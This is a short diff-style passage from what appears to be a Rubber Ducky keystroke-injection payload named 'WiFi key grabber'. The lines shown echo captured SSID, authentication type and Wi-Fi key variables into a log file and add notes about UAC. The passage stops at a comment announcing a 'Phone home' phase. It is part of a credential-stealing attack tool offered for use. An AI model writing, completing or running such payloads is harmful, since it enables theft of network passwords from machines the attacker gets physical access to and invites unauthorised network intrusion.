abhinavvv03/Rubber-Duckey/Payload---WiFi-key-grabber.md

 ENTER
 REM --> Write all info to log
 STRING echo ssid: %a%>>log & echo type: %b%>>log & echo auth: %c%>>log & echo key: %d%>>log
 ENTER
+STRING echo If all variables are empty there was no wireless connection>>log ENTER
+STRING echo If only the key variable is empty the payload requires UAC>>log ENTER

 REM FASE 3: Phone home